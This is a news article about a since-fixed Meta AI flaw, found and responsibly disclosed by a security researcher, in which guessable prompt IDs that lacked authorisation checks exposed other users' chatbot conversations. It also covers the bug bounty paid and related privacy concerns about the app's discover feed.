Meta AI reportedly had a vulnerability that could be exploited to access other users’ private conversations with the chatbot. Accessing this bug did not require breaking into Meta’s servers or manipulating the code of the app; instead, it could be triggered by just analysing the network traffic. As per the report, a researcher found the bug late last year and informed the Menlo Park-based social media giant about it. The company then deployed a fix to the issue in January, and rewarded the researcher for finding the exploit.
According to a TechCrunch report, the Meta AI vulnerability was discovered by Sandeep Hodkasia, founder of AppSecure, a security testing firm. The researcher reportedly informed Meta about it in December 2024 and received a bug bounty reward of $10,000 (roughly Rs. 8.5 lakh). Meta spokesperson Ryan Daniels told the publication that the issue was fixed in January, and that the company did not find any evidence of the method being used by bad actors.
The vulnerability reportedly was in how Meta AI handled user prompts on its servers. The researcher told the publication that the AI chatbot assigns a unique ID to every prompt and its AI-generated responses whenever a logged-in user tries to edit the prompt to regenerate an image or text. In a general use case, such incidents are very common, as most people conversationally try to get a better response or a desired image.
Hodkasia reportedly found that he could access his unique number by analysing the network traffic on the browser while editing an AI prompt. Then, by changing the number, the researcher could access someone else’s prompt and designated AI response, the report claimed. The researcher claimed that these numbers were “easily guessable” and finding another legitimate ID did not take much effort.
Essentially, the vulnerability existed in the way the AI system handled the authorisation of these unique IDs, and did not place enough security measures to check who was accessing this data. That means, in the hands of a bad actor, this method could have led to compromising a large amount of private data of users.
Notably, a report last month found that the Meta AI app’s discover feed was filled with posts that appeared to be private conversations with the chatbot. These messages included asking for medical and legal advice, and even confessing to crimes. Later in June, the company began showing a warning message to dissuade people from unknowingly sharing their conversations.